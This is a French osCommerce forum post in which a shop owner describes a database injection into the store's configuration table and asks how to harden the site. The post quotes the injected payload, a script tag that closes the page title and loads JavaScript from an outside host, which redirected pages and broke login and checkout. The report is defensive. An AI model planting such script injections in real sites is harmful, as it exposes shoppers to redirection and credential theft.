osCommerce France : Accueil Forum Portail osCommerce France Réponses aux questions Foire aux contributions

Bienvenue invité ( Connexion | Inscription )

> [Resolu] Code injecte : script src=http://exero.eu/catalog/jquery.js, Faille dans une requete et acces a la BD
ipolis
posté 3 Aug 2011, 15:45
Message #1


Ceinture jaune+ OSC
Icône de groupe

Groupe : Membres
Messages : 83
Inscrit : 9-May 04
Lieu : Poitou-Charentes
Membre no 2448



Bonjour a tous,

J'ai eu une injection de code dans la table configuration de ma boutique Osc.
Champ : configuration_value : code injecté : [Nom de ma boutique] </title><script src=http://exero.eu/catalog/jquery.js></script><title>

J'ai retiré ce code maléfique, qui redirigé et empeché toute execution du code suivant sur mes pages (Login, checkout, etc...)

Mon probleme maintenant : J'ai effectué y'a pas mal de temps toute la SECU initiale préconisé ici sur les forums depuis bien longtemps. ADMIN renomé, File_manager viré, fichier index.php et index.html dans les reps images, droits linux minimums pour OSC...

Seul un FckEditor et un TinyMCE sur cet hebergement me questionne coté SECU... (ou la je ne suis pas sur du tout de moi.. pffff)
(Je n'ai pas PHPMyvisites d'installés ni PHPBB... )

Ma question : comment proteger le MIEUX mon OSC pour eviter des injections dans la BD ? (J'ai lu les FAQs aussi et mis en pratique)
Des hackers d'un nouveau genre ?

Ce message a été modifié par ipolis - 6 Aug 2011, 16:24.


--------------------
MS2 2.3 FR avec des contribs ajoutées et du code, du code, du code.. :
Contribs: Module livraison par Pays et Zones, Autosauve, low stock,Product description, Google Position, seo, Google XML Sitemap - Admin 2.x, dhtmlcategories10, product-tabsv1-3_french, Products On Order 1.2 - Heb: Mutualisé OVH PRO
Go to the top of the page
 

Les messages de ce sujet


Reply to this topicStart new topic
1 utilisateur(s) sur ce sujet (1 invité(s) et 0 utilisateur(s) anonyme(s))
0 membre(s) :

 



RSS Version bas débit Nous sommes le : 28th March 2024 - 23:03
Ce site est déclaré auprès de la commision Nationale
de l'Informatique et des Libertés (déclaration n°: 1043896)